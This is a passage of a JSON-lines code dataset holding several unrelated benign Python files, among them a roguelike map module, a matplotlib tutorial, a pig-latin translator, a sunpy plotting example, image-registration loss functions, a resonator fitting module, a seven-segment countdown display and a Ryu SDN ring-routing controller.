+ \"]\")\n\n # find distance between two characters\n distPair = self.getDistanceTo(characterLooking, foundChar)\n # print(distPair)\n xStepAmount = 0\n yStepAmount = 0\n xStepAt = 0\n yStepAt = 0\n xStepCounter = 0\n yStepCounter = 0\n if(distPair[0] != 0 and distPair[1] != 0):\n if(distPair[0] > distPair[1]):\n xStepAt = int(round(distPair[0]/distPair[1] + 0.01))\n elif(distPair[0] < distPair[1]):\n yStepAt = int(round(distPair[1]/distPair[0] + 0.01))\n # print(\"xStepAt: \" + str(xStepAt))\n # print(\"yStepAt: \" + str(yStepAt))\n\n # figure out the stepAmount\n if(chary < y and charx < x):\n yStepAmount += 1\n xStepAmount += 1\n elif(chary < y and charx > x):\n yStepAmount += 1\n xStepAmount -= 1\n elif(chary > y and charx > x):\n yStepAmount -= 1\n xStepAmount -= 1\n elif(chary > y and charx < x):\n yStepAmount -= 1\n xStepAmount += 1\n elif(chary == y and charx > x):\n xStepAmount -= 1\n elif(chary == y and harxx < x):\n xStepAmount += 1\n elif(chary < y and charx == x):\n yStepAmount += 1\n elif(chary > y and charx == x):\n yStepAmount -= 1\n\n checky = chary\n checkx = charx\n canSee = True\n while(1):\n if(checkx == x and checky == y):\n break\n # \"close enough\" check\n if((checkx == x+1 and checky == y) or (checkx == x-1 and checky == y) or (checky == y+1 and checkx == x) or (checky == y-1 and checkx == x)):\n break\n if(xStepCounter == 0):\n checkx += xStepAmount\n xStepCounter = 0\n if(yStepCounter == 0):\n checky += yStepAmount\n yStepCounter = 0\n xStepCounter += 1\n yStepCounter += 1\n if(xStepCounter >= xStepAt):\n xStepCounter = 0\n if(yStepCounter >= yStepAt):\n yStepCounter = 0\n # self.getTile(checky, checkx).setToken(\"x\")\n if(self.getTile(checky, checkx).getBlocked() == True):\n if(self.getTile(checky, checkx).getCharacter() != foundChar):\n # print(str(checky) + \",\" + str(checkx) + \" is blocked\")\n canSee = False\n break\n\n\n if(canSee == True):\n listOfCharactersFound.append(self.getTile(y,x).getCharacter())\n return listOfCharactersFound\n\n def getPlayerLocation(self, charToFind):\n for y in range(0, self.maxHeight):\n for x in range(0, self.maxWidth):\n if(self.getTile(y,x).getCharacter() == charToFind):\n return [y,x]\n\n def getClosestCharacter(self, baseChar, listOfChars):\n closestChar = None\n closestDist = 0\n for checkChar in listOfChars:\n yx = self.getDistanceTo(baseChar, checkChar)\n dist = (((yx[0]**2) + (yx[1]**2))**(1/2))\n if(closestChar == None):\n closestChar = checkChar\n closestDist = dist\n elif(dist < closestDist):\n closestChar = checkChar\n closestDist = dist\n return closestChar\n\n # return 1 on successful move, 0 on a fail\n def moveCharacter(self, movingChar, direction):\n # print(\"moving \" + str(movingChar) + \" in direction \" + str(direction))\n yx = self.getPlayerLocation(movingChar)\n tileOfMovingChar = self.getTile(yx[0],yx[1])\n canMove = False\n newX = 0\n newY = 0\n # like keypad (5 is char loc)\n # 7 8 9\n # 4 5 6\n # 1 2 3\n # down and left\n if(direction == 1):\n newY = yx[0]+1\n newX = yx[1]-1\n # down\n if(direction == 2):\n newY = yx[0]+1\n newX = yx[1]\n # down and right\n if(direction == 3):\n newY = yx[0]+1\n newX = yx[1]+1\n # left\n if(direction == 4):\n newY = yx[0]\n newX = yx[1]-1\n # not moving always results in a sucessful move, and no more work needs to be done\n if(direction == 5):\n return 1\n # right\n if(direction == 6):\n newY = yx[0]\n newX = yx[1]+1\n # up and left\n if(direction == 7):\n newY = yx[0]-1\n newX = yx[1]-1\n # up\n if(direction == 8):\n newY = yx[0]-1\n newX = yx[1]\n # up and right\n if(direction == 9):\n newY = yx[0]-1\n newX = yx[1]+1\n if((newY < self.getHeight()-1 and newY > 0) and (newX < self.getWidth()-1 and newX > 0)):\n newTile = self.getTile(newY, newX)\n # print(newTile.getBlocked())\n if(newTile.getBlocked() == False):\n newTile.setCharacter(tileOfMovingChar.getCharacter())\n newTile.setBlocked(True)\n tileOfMovingChar.setCharacter(None)\n tileOfMovingChar.setBlocked(False)\n return 1\n else:\n return 0\n else:\n return 0\n","sub_path":"core/maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":17140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"83052043","text":"import matplotlib.pyplot as plt \nimport numpy as np\n\nx = np.linspace(-3,3,50)\ny1 = 2*x +1\ny2 = x**2\n\n\nplt.figure(num=5,figsize=(6,4))\nplt.plot(x,y1)\nplt.plot(x,y2,color='red',linewidth=1.0,linestyle='--')\n\nplt.xlim((-1,2))\nplt.ylim((-2,3))\n\nplt.xlabel('this is x')\nplt.ylabel('this is y')\n\nnew_ticks = np.linspace(-1,2,5)\nplt.xticks(new_ticks)\nplt.yticks([-2,-1.6,-1,1.22,3],\n\t\t\t['terrible','bad','normal',r'$beta$',r'$\\alpha$'])\n\n#gca = 'get curretn axis'\nax = plt.gca()\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\nax.xaxis.set_ticks_position('bottom')\nax.yaxis.set_ticks_position('left')\nax.spines['bottom'].set_position(('data',-1))\nax.spines['left'].set_position(('data',0))\n\nplt.show()\n\n","sub_path":"Machine Learning - Mofan/Matplotlib-莫凡/matplotlib-19讲/6.坐标轴设置二.py","file_name":"6.坐标轴设置二.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"251296863","text":"\"\"\"\nVery hard mode\nComplete all requirements of Hard Mode, as well as giving your program the ability to read in a pig latin string\n and output a plain english sentence. Replace first vowel characters with a \"_\".\n\"\"\"\n\n\ndef translate_word(word):\n if word[0] in \"aeiou\":\n return word[1:] + \"say\"\n else:\n return \"{}{}ay\".format(word[1:], word[0])\n\n\ndef convert_to_pyglatin(writing):\n new_writing = []\n for word in writing.split():\n new_writing.append(translate_word(word.lower()))\n return \" \".join(new_writing)\n\n\ndef back_to_english(writing):\n new_writing = []\n for word in writing.split():\n word = word.lower()\n if word[-3:] == \"say\":\n new_writing.append(\"_\" + word[:-3])\n else:\n new_writing.append(\"{}{}\".format(word[-3], word[:-3]))\n return \" \".join(new_writing)\n\n\nwriting = input(\"Please enter some text: \").lower()\n\noption = input(\"\"\"\nWhat do you want to do?\na)convert English to Pyglatin\nb)convert Pyglatin to English\n\"\"\").lower()\n\nif option == 'a':\n print(convert_to_pyglatin(writing))\nelif option == 'b':\n print(back_to_english(writing))\nelse:\n print(\"Not a valid option\")\n","sub_path":"pyglatin_veryhard.py","file_name":"pyglatin_veryhard.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"296875655","text":"\"\"\"\n==========================================================\nOverplotting SRS active region locations on a magnetograms\n==========================================================\n\nHow to find and plot the location of an active region on an HMI magnetogram.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom astropy.coordinates import SkyCoord\n\nimport sunpy.coordinates\nimport sunpy.data.sample\nimport sunpy.map\nfrom sunpy.io.special import srs\n\n##############################################################################\n# For this example, we will start with the sample data. We need an HMI file and\n# use it to create a map, and the SRS table which contains a list of active\n# regions. Both of these data can be downloaded with ``Fido``.\n\nsmap = sunpy.map.Map(sunpy.data.sample.HMI_LOS_IMAGE)\nsrs_table = srs.read_srs(sunpy.data.sample.SRS_TABLE)\n\n##############################################################################\n# We only need the rows which have 'ID' = 'I' or 'IA'.\n# Some tables do not have these columns, so we exit the script if they are not\n# present.\n\nif 'I' in srs_table['ID'] or 'IA' in srs_table['ID']:\n srs_table = srs_table[np.logical_or(srs_table['ID'] == 'I',\n srs_table['ID'] == 'IA')]\nelse:\n raise ValueError(\"No I or IA entries for this date.\")\n\n##############################################################################\n# Now we extract the latitudes, longitudes and the region numbers. We make an\n# empty list if there are no ARs.\n\nif srs_table is not None:\n lats = srs_table['Latitude']\n lngs = srs_table['Longitude']\n numbers = srs_table['Number']\nelse:\n lats = lngs = numbers = []\n\n##############################################################################\n# Let's plot the results by defining coordinates for each location.\n\nax = plt.subplot(projection=smap)\nsmap.plot(vmin=-120, vmax=120)\nsmap.draw_limb()\nax.set_autoscale_on(False)\n\nif len(lats) > 0:\n c = SkyCoord(lngs, lats, frame=\"heliographic_stonyhurst\")\n ax.plot_coord(c, 'o')\n\n for i, num in enumerate(numbers):\n ax.annotate(num, (lngs[i].value, lats[i].value),\n xycoords=ax.get_transform('heliographic_stonyhurst'),\n color='red',\n fontweight='bold',\n )\n\nplt.show()\n","sub_path":"examples/plotting/magnetogram_active_regions.py","file_name":"magnetogram_active_regions.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"638146434","text":"\"\"\"Loss functions\"\"\"\n\nimport torch\nimport torch.nn as nn\n\nfrom model.submodules import resample_transform\n\ndef diffusion_loss(dvf):\n \"\"\"\n Calculate diffusion loss as a regularisation on the displacement vector field (DVF)\n\n Args:\n dvf: (Tensor of shape (N, 2, H, W)) displacement vector field estimated\n\n Returns:\n diffusion_loss_2d: (Scalar) diffusion regularisation loss\n \"\"\"\n\n # spatial derivatives\n dvf_dx = dvf[:, :, 1:, 1:] - dvf[:, :, :-1, 1:] # (N, 2, H-1, W-1)\n dvf_dy = dvf[:, :, 1:, 1:] - dvf[:, :, 1:, :-1] # (N, 2, H-1, W-1)\n return (dvf_dx.pow(2) + dvf_dy.pow(2)).mean()\n\n##############################################################################################\n# --- Huber loss --- #\n##############################################################################################\n\ndef huber_loss_spatial(dvf):\n \"\"\"\n Calculate approximated spatial Huber loss\n Args:\n dvf: (Tensor of shape (N, 2, H, W)) displacement vector field estimated\n\n Returns:\n loss: (Scalar) Huber loss spatial\n\n \"\"\"\n eps = 1e-8 # numerical stability\n\n # spatial derivatives\n dvf_dx = dvf[:, :, 1:, 1:] - dvf[:, :, :-1, 1:] # (N, 2, H-1, W-1)\n dvf_dy = dvf[:, :, 1:, 1:] - dvf[:, :, 1:, :-1] # (N, 2, H-1, W-1)\n return ((dvf_dx.pow(2) + dvf_dy.pow(2)).sum(dim=1) + eps).sqrt().mean()\n\n\ndef huber_loss_temporal(dvf):\n \"\"\"\n Calculate approximated temporal Huber loss\n\n Args:\n dvf: (Tensor of shape (N, 2, H, W)) displacement vector field estimated\n\n Returns:\n loss: (Scalar) huber loss temporal\n\n \"\"\"\n eps = 1e-8 # numerical stability\n\n # magnitude of the dvf\n dvf_norm = torch.norm(dvf, dim=1) # (N, H, W)\n\n # temporal derivatives, 1st order\n dvf_norm_dt = dvf_norm[1:, :, :] - dvf_norm[:-1, :, :]\n loss = (dvf_norm_dt.pow(2) + eps).sum().sqrt()\n return loss\n\n\n# --- construct the loss function --- #\nsim_losses = {\"MSE\": nn.MSELoss()}\nreg_losses = {\"huber_spt\": huber_loss_spatial,\n \"diffusion\": diffusion_loss}\n\n\ndef loss_fn(dvf, target, source, params):\n \"\"\"\n Unsupervised loss function\n\n Args:\n dvf: (Tensor, shape Nx2xHxW) predicted displacement vector field\n target: (Tensor, shape NxchxHxW) target image\n source: (Tensor, shape NxchxHxW) source image\n params: (object) model parameters\n\n Returns:\n loss: (scalar) loss value\n losses: (dict) dictionary of individual losses (weighted)\n \"\"\"\n\n # warp the source image towards target using grid resample (spatial transformer)\n # i.e. dvf is from target to source\n warped_source = resample_transform(source, dvf)\n\n sim_loss = sim_losses[params.sim_loss](target, warped_source)\n reg_loss = reg_losses[params.reg_loss](dvf) * params.reg_weight\n\n loss = sim_loss + reg_loss\n losses = {params.sim_loss: sim_loss, params.reg_loss: reg_loss}\n\n return loss, losses\n","sub_path":"cardiac_motion/model/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"134284953","text":"import numpy as np\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\nfrom uncertainties import umath\nfrom uncertainties import unumpy\nfrom uncertainties import ufloat\n\ndef find_nearest_idx(array,value):\n idx = (np.abs(array-value)).argmin()\n return idx\n\ndef lin_to_dB(y):\n return 10*np.log10(y)\n\ndef guess_fo(f, gamma2):\n ind_fo = np.argmin(gamma2) #find index of resonant frequency\n return f[ind_fo]\n\ndef guess_offset(y):\n low_filt_perc = 0.33\n y_filtered = stats.trim1(y, low_filt_perc, tail = 'left') #cut out bottom low_filt_perc of y values. Basically want to filter out the notch a bit.\n return np.median(y_filtered)\n\ndef guess_dy(y):\n return guess_offset(y) - np.min(y) \n\ndef guess_q(f, y):\n ind_fc = np.argmin(y) #find index of resonant frequency\n fc = f[ind_fc] #obtain resonant frequency\n\n #look at the left of the resonance\n left_f = f[:ind_fc] \n left_y = y[:ind_fc] \n dy = guess_dy(y)\n ind_fwhm = find_nearest_idx(left_y, dy/2)\n\n #find distance between fwhm and resonance\n f1 = f[ind_fwhm]\n #guess bandwidth as twice that distance\n del_f = 2*(fc-f1)\n Q_guess = fc/del_f\n return Q_guess\n\n\ndef guess_reflection_fit_params(f, gamma2):\n fo_guess = guess_fo(f, gamma2)\n Q_guess = guess_q(f, gamma2)\n dy_guess = guess_dy(gamma2)\n C_guess = guess_offset(gamma2)\n return fo_guess, Q_guess, dy_guess, C_guess\n\n \ndef func_pow_reflected(f, fo, Q, del_y, C):\n return -(fo/(2*Q))**2*del_y/((f-fo)**2+(fo/(2*Q))**2)+C\n\ndef plot_mag_phase( x, ymag, yphase):\n fig, ax1 = plt.subplots()\n \n color = 'tab:red'\n ax1.set_xlabel('Frequency (MHz)')\n ax1.set_ylabel(r'$|\\Gamma|$', color=color)\n ax1.plot(x, ymag, color=color)\n ax1.tick_params(axis='y', labelcolor=color)\n \n ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n \n color = 'tab:blue'\n ax2.set_ylabel(r'$\\angle \\Gamma$ ', color=color) # we already handled the x-label with ax1\n ax2.plot(x, yphase, color=color)\n ax2.tick_params(axis='y', labelcolor=color)\n \n fig.tight_layout() # otherwise the right y-label is slightly clipped\n \n\ndef get_arr_ends(x, n_end_elements):\n return np.concatenate([x[:n_end_elements],x[-n_end_elements:]])\n\ndef deconvolve_transmission(f, gamma_mag, gamma_phase, C_fit):\n gamma_cav_mag = gamma_mag*np.sqrt(1/C_fit)\n\n interp_phase = interp1d(f, gamma_phase, kind='cubic')\n f_ends = get_arr_ends(f, 5)\n phase_ends = get_arr_ends(gamma_phase, 5)\n# interp_phase_wo_notch = interp1d(f_ends, phase_ends, kind='linear')\n interp_phase_wo_notch = np.poly1d(np.polyfit(f_ends, phase_ends, 1))\n del_phase_line = interp_phase_wo_notch(f)\n gamma_cav_phase = interp_phase(f) - del_phase_line\n\n return gamma_cav_mag, gamma_cav_phase\n\n# interp_mag = interp1d(f, deconvolved_mag, kind='cubic')\n# interp_sig_mag = interp1d(f, deconvolved_sig_mag, kind='cubic')\n# interp_phase = interp1d(f, deconvolved_phase, kind='cubic')\n#\n\ndef calculate_coupling(gamma_mag_fo, gamma_phase_fo):\n beta = (1+np.sign(gamma_phase_fo - np.pi)*np.abs(gamma_mag_fo))/(1-np.sign(gamma_phase_fo - np.pi)*np.abs(gamma_mag_fo))\n return beta\n \n\n\n","sub_path":"source/reflection_fit_module.py","file_name":"reflection_fit_module.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"633334950","text":"#!/usr/bin/python\nimport time\nimport datetime\nfrom Adafruit_LED_Backpack import SevenSegment\n\nsegment = SevenSegment.SevenSegment(address=0x70)\n# Continually update the time on a 4 char, 7-segment display\nsegment.begin()\n\n\ndef countdown(t):\n now = datetime.datetime.now() \n second = now.second\n segment.clear()\n while t:\n mins, secs = divmod(t, 60)\n time.sleep(1)\n t -= 1\n segment.set_digit(0, int(mins / 10)) # Tens\n segment.set_digit(1, mins % 10) # Ones\n # Set minutes\n segment.set_digit(2, int(secs / 10)) # Tens\n segment.set_digit(3, secs % 10) # Ones\n # Toggle colon\n segment.set_colon(second % 2) # Toggle colon at 1Hz\n # Write the display buffer to the hardware. This must be called to\n # update the actual display LEDs.\n segment.write_display()\n\n # Wait a quarter second (less than 1 second to prevent colon blinking getting$\n # time.sleep(0.25)\n\n print('Fire in the hole!')\n\nt = 120 # in seconds\ncountdown(t)\n","sub_path":"crowpie/time_bomb.py","file_name":"time_bomb.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"128404889","text":"from ryu.base import app_manager\r\nfrom ryu.controller import ofp_event\r\nfrom ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER\r\nfrom ryu.controller.handler import set_ev_cls\r\nfrom ryu.ofproto import ofproto_v1_3\r\nfrom ryu.lib.packet import packet\r\nfrom ryu.lib.packet import ethernet, ether_types\r\nfrom ryu.lib.packet import arp\r\nfrom ryu.topology import event, switches\r\nfrom ryu.topology.api import get_switch, get_link, get_all_host\r\n\r\n\r\nrouting_matrix = []\r\ntopoOk = False\r\nhostOk = False\r\ni = 0\r\n\r\n\r\nclass switch(app_manager.RyuApp):\r\n OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]\r\n\r\n def __init__(self, *args, **kwargs):\r\n super(switch, self).__init__(*args, **kwargs)\r\n\r\n # Effettuo il topology discovery di links e switches\r\n @set_ev_cls(event.EventSwitchEnter)\r\n def get_topology_data(self, ev):\r\n switch_list = get_switch(self, None)\r\n switches = [switch.dp.id for switch in switch_list]\r\n links_list = get_link(self, None)\r\n links = [(link.src.dpid, link.dst.dpid, link.src.port_no) for link in links_list]\r\n print(\"\\n---------------------\")\r\n print(\"Added switch id => \"),\r\n print(switch.dp.id)\r\n print(\"link status => \"),\r\n print(links)\r\n print(\"---------------------\\n\")\r\n global routing_matrix\r\n global topoOk\r\n if not topoOk and isRing(switches, links):\r\n # routing_matrix = []\r\n for sw in switches:\r\n sw_links = [link for link in links if link[0] == sw]\r\n # sw_links[0][0] e' uguale a sw\r\n sw_ccw = [x for x in routing_matrix if\r\n sw == x.id_cw] # cerco se c'e' gia salvato un sw (ccw rispetto a me)\r\n sw_cw = [x for x in routing_matrix if sw == x.id_ccw] # cerco anche per l'altro senso\r\n if sw_ccw: # check se c'e' switch gia salvato con id_cw il mio id\r\n if sw_ccw[0].id == sw_links[0][1]:\r\n routing_matrix.append(\r\n ringNode(sw, sw_links[1][1], sw_links[0][1], sw_links[1][2], sw_links[0][2], \"\", \"\", 0))\r\n\r\n else: # altrimenti e' il contrario\r\n routing_matrix.append(\r\n ringNode(sw, sw_links[0][1], sw_links[1][1], sw_links[0][2], sw_links[1][2], \"\", \"\", 0))\r\n\r\n elif sw_cw:\r\n if sw_cw[0].id == sw_links[0][1]:\r\n routing_matrix.append(\r\n ringNode(sw, sw_links[0][1], sw_links[1][1], sw_links[0][2], sw_links[1][2], \"\", \"\", 0))\r\n else:\r\n routing_matrix.append(\r\n ringNode(sw, sw_links[1][1], sw_links[0][1], sw_links[1][2], sw_links[0][2], \"\", \"\", 0))\r\n else: # se non ho trovato altro allora e' nuovo\r\n routing_matrix.append(\r\n ringNode(sw, sw_links[0][1], sw_links[1][1], sw_links[0][2], sw_links[1][2], \"\", \"\", 0))\r\n topoOk = True\r\n print(\"\\n---------------------\\nRouting Matrix Completed\\n\")\r\n printMat(routing_matrix)\r\n print(\"---------------------\\n\")\r\n\r\n @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\r\n def switch_features_handler(self, ev):\r\n datapath = ev.msg.datapath\r\n ofproto = datapath.ofproto\r\n parser = datapath.ofproto_parser\r\n\r\n # installiamo la default miss entry\r\n match = parser.OFPMatch()\r\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER, ofproto.OFPCML_NO_BUFFER)]\r\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS, actions)]\r\n mod = parser.OFPFlowMod(datapath=datapath, priority=0, match=match, instructions=inst)\r\n datapath.send_msg(mod)\r\n\r\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\r\n def packet_in_handler(self, ev):\r\n msg = ev.msg\r\n datapath = msg.datapath\r\n ofproto = datapath.ofproto\r\n parser = datapath.ofproto_parser\r\n in_port = msg.match['in_port']\r\n dpid = datapath.id\r\n pkt = packet.Packet(msg.data)\r\n eth = pkt.get_protocol(ethernet.ethernet)\r\n arp_in = pkt.get_protocol(arp.arp)\r\n\r\n # installo le tabelle dopo aver acquisito tutti gli host\r\n global hostOk\r\n global routing_matrix\r\n sw = [x for x in routing_matrix if x.id == dpid]\r\n sw_obj = sw[0]\r\n if hostOk and not sw_obj.installed: # and non ho ancora installato la tabella su dpid\r\n\r\n # prendendo i riferimenti dall'oggetto switch che matcha l'id compilo flow e group tables\r\n # poi set flag di avvenuta installazione (cosi la prossima volta evito di reinstallare)\r\n self.group_mod(datapath, sw_obj.port_cw, sw_obj.port_ccw)\r\n self.flow_mod(datapath, sw_obj)\r\n\r\n # set flag di installazione avvenuta\r\n idx = 0\r\n for s in routing_matrix:\r\n if s.id == sw_obj.id:\r\n routing_matrix[idx].installed = 1\r\n break\r\n idx += 1\r\n\r\n print(\"\\n---------------------\")\r\n print(\"Tables installed on switch\", dpid)\r\n print(\"---------------------\\n\")\r\n\r\n # gestione centralizzata arp\r\n if arp_in is not None:\r\n assert arp_in.opcode == arp.ARP_REQUEST\r\n print(\"\\n---------------------\")\r\n print(\"ARP packet from DP id-> \", dpid, \"SRC mac->\",eth.src)\r\n print(\"---------------------\\n\")\r\n destination_host_mac = None\r\n host_list = get_all_host(self)\r\n for host in host_list:\r\n if arp_in.dst_ip in host.ipv4:\r\n destination_host_mac = host.mac\r\n break\r\n\r\n # aggiungo host a routing matrix\r\n global i\r\n # if i < len(routing_matrix):\r\n if i < 3:\r\n for host in host_list:\r\n for sw in routing_matrix:\r\n if host.port.dpid == sw.id and sw.host_mac is \"\":\r\n sw.host_mac = host.mac\r\n sw.host_port = int(host.port.name[-1])\r\n i += 1\r\n\r\n # elif not hostOk and i == len(routing_matrix):\r\n elif not hostOk and i == 3:\r\n hostOk = True\r\n print(\"\\n---------------------\")\r\n print(\"Discover all hosts\")\r\n printMat(routing_matrix)\r\n print(\"---------------------\\n\")\r\n\r\n # host non trovato\r\n if destination_host_mac is None:\r\n return\r\n pkt_out = packet.Packet()\r\n eth_out = ethernet.ethernet(\r\n dst=eth.src,\r\n src=destination_host_mac,\r\n ethertype=ether_types.ETH_TYPE_ARP\r\n )\r\n arp_out = arp.arp(\r\n opcode=arp.ARP_REPLY,\r\n src_mac=destination_host_mac,\r\n src_ip=arp_in.dst_ip,\r\n dst_mac=arp_in.src_mac,\r\n dst_ip=arp_in.src_ip\r\n )\r\n pkt_out.add_protocol(eth_out)\r\n pkt_out.add_protocol(arp_out)\r\n pkt_out.serialize()\r\n actions = [\r\n parser.OFPActionOutput(\r\n in_port\r\n )\r\n ]\r\n out = parser.OFPPacketOut(\r\n datapath=datapath,\r\n buffer_id=ofproto.OFP_NO_BUFFER,\r\n in_port=ofproto.OFPP_CONTROLLER,\r\n actions=actions,\r\n data=pkt_out.data\r\n )\r\n datapath.send_msg(out)\r\n\r\n else:\r\n return\r\n\r\n # definisco la funzione che compila la flow table\r\n def flow_mod(self, datapath, sw):\r\n ofp = datapath.ofproto\r\n ofp_parser = datapath.ofproto_parser\r\n table_id = 0\r\n\r\n # inoltro da porta cw\r\n match = ofp_parser.OFPMatch(in_port=sw.port_ccw)\r\n actions = [ofp_parser.OFPActionGroup(1)]\r\n inst = [ofp_parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS,\r\n actions)]\r\n req2 = ofp_parser.OFPFlowMod(datapath, table_id, ofp.OFPFC_ADD,\r\n priority=1, match=match, instructions=inst)\r\n datapath.send_msg(req2)\r\n\r\n # inoltro da porta ccw\r\n match = ofp_parser.OFPMatch(in_port=sw.port_cw)\r\n actions = [ofp_parser.OFPActionOutput(sw.port_ccw)]\r\n inst = [ofp_parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS,\r\n actions)]\r\n req3 = ofp_parser.OFPFlowMod(datapath, table_id, ofp.OFPFC_ADD,\r\n priority=1, match=match, instructions=inst)\r\n datapath.send_msg(req3)\r\n\r\n if sw.host_mac is not \"\":\r\n # inoltro all'host\r\n match = ofp_parser.OFPMatch(eth_dst=sw.host_mac)\r\n actions = [ofp_parser.OFPActionOutput(sw.host_port)]\r\n inst = [ofp_parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS,\r\n actions)]\r\n req1 = ofp_parser.OFPFlowMod(datapath, table_id, ofp.OFPFC_ADD,\r\n priority=3, match=match, instructions=inst)\r\n datapath.send_msg(req1)\r\n\r\n # inoltro da porta host\r\n match = ofp_parser.OFPMatch(in_port=sw.host_port)\r\n actions = [ofp_parser.OFPActionGroup(2)]\r\n inst = [ofp_parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS,\r\n actions)]\r\n req4 = ofp_parser.OFPFlowMod(datapath, table_id, ofp.OFPFC_ADD,\r\n priority=1, match=match, instructions=inst)\r\n datapath.send_msg(req4)\r\n\r\n # manda ARP al controllore\r\n match = ofp_parser.OFPMatch(in_port=sw.host_port, eth_type=0x0806)\r\n actions = [ofp_parser.OFPActionOutput(ofp.OFPP_CONTROLLER, ofp.OFPCML_NO_BUFFER)]\r\n inst = [ofp_parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\r\n req5 = ofp_parser.OFPFlowMod(datapath=datapath, priority=2, match=match, instructions=inst)\r\n datapath.send_msg(req5)\r\n\r\n # definisco la funzione che compila la group table\r\n def group_mod(self, datapath, cw, ccw):\r\n ofp = datapath.ofproto\r\n ofp_parser = datapath.ofproto_parser\r\n\r\n # group id che gestisce i pacchetti in senso orario\r\n actions_norm = [ofp_parser.OFPActionOutput(cw)]\r\n actions_fault = [ofp_parser.OFPActionOutput(ofp.OFPP_IN_PORT)]\r\n buckets_1 = [ofp_parser.OFPBucket(watch_port=cw, actions=actions_norm),\r\n ofp_parser.OFPBucket(watch_port=ccw, actions=actions_fault)]\r\n req_1 = ofp_parser.OFPGroupMod(datapath, ofp.OFPGC_ADD,\r\n ofp.OFPGT_FF, group_id=1, buckets=buckets_1)\r\n datapath.send_msg(req_1)\r\n\r\n # group id che gestisce i pacchetti dall'host\r\n actions_fault_host = [ofp_parser.OFPActionOutput(ccw)]\r\n buckets_2 = [ofp_parser.OFPBucket(watch_port=cw, actions=actions_norm),\r\n ofp_parser.OFPBucket(watch_port=ccw, actions=actions_fault_host)]\r\n req_2 = ofp_parser.OFPGroupMod(datapath, ofp.OFPGC_ADD,\r\n ofp.OFPGT_FF, group_id=2, buckets=buckets_2)\r\n datapath.send_msg(req_2)\r\n\r\n\r\nclass ringNode(object):\r\n id = \"\"\r\n id_cw = \"\"\r\n id_ccw = \"\"\r\n port_cw = \"\"\r\n port_ccw = \"\"\r\n host_port = \"\"\r\n host_mac = \"\"\r\n installed = \"\"\r\n\r\n # The class \"constructor\" - It's actually an initializer\r\n def __init__(self, id, id_cw, id_ccw, port_cw, port_ccw, host_port, host_mac, installed):\r\n self.id = id\r\n self.id_cw = id_cw\r\n self.id_ccw = id_ccw\r\n self.port_cw = port_cw\r\n self.port_ccw = port_ccw\r\n self.host_port = host_port\r\n self.host_mac = host_mac\r\n self.installed = installed\r\n\r\n\r\ndef printMat(mat):\r\n for sw in mat:\r\n print(\"id:\"),\r\n print(sw.id),\r\n print(\" id_cw:\"),\r\n print(sw.id_cw),\r\n print(\" id_ccw:\"),\r\n print(sw.id_ccw),\r\n print(\" port_cw:\"),\r\n print(sw.port_cw),\r\n print(\" port_ccw:\"),\r\n print(sw.port_ccw)\r\n print(\" host_port:\"),\r\n print(sw.host_port)\r\n print(\" host_mac:\"),\r\n print(sw.host_mac)\r\n print(\" installed:\"),\r\n print(sw.installed)\r\n\r\n\r\ndef isRing(switches, links):\r\n for sw in switches:\r\n sw_links = [x for x in links if x[0] == sw]\r\n if len(sw_links) < 2 or not [x for x in sw_links for y in links if x[1] == y[0]]:\r\n return False\r\n return True","sub_path":"final_controller.py","file_name":"final_controller.py","file_ext":"py","file_size_in_byte":12918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"408055718","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c) 2018 Piero Dalle Pezze\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nimport logging\nimport sys\nimport 